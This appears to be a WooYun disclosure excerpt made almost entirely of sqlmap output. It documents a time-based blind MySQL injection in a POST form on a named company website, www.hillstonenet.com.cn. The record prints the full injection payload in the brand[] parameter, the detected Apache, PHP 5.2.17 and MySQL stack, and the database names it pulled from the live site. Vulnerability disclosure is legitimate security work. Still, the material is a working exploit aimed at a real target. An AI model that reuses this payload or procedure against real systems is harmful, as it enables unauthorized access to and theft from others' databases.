WooYun.org

sqlmap identified the following injection point(s) with a total of 181 HTTP(s) r
equests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: brand[]=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SE
LECT(SLEEP(5)))OdMr) AND 'HqPD'='HqPD'+(select(0)from(select(sleep(0)))v)+'"+(se
lect(0)from(select(sleep(0)))v)+"/&company=Acunetix&configable=%e7%86%9f%e7%bb%8
3&credentiales[]=CCNA&email=admin@qq.com&environment=%e7%8e%b0%e7%bd%91%e6%b5%81
%e9%87%8f%e7%8e%af%e5%a2%83&equipment[]=%e4%b8%8b%e4%b8%80%e4%bb%a3%e9%98%b2%e7%
81%ab%e5%a2%99&experience=1-3&hangye=%e6%94%bf%e5%ba%9c&media[]=%e6%96%b0%e6%b5%
aa%e5%be%ae%e5%8d%9a&renshu=100%e4%ba%ba%e4%bb%a5%e4%b8%8b&shipin=%e6%98%af&tel=
555-666-0606&username=admin
---
[13:54:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[13:54:09] [INFO] fetching database names
[13:54:09] [INFO] fetching number of databases
[13:54:09] [INFO] retrieved:
[13:54:09] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[13:54:22] [INFO] retrieved:
[13:54:27] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[13:57:06] [INFO] retrieved: hillstonenet
available databases [2]:
[*] hillstonenet
[*] information_schema
[13:59:06] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.hillstonenet.com.cn'
[*] shutting down at 13:59:06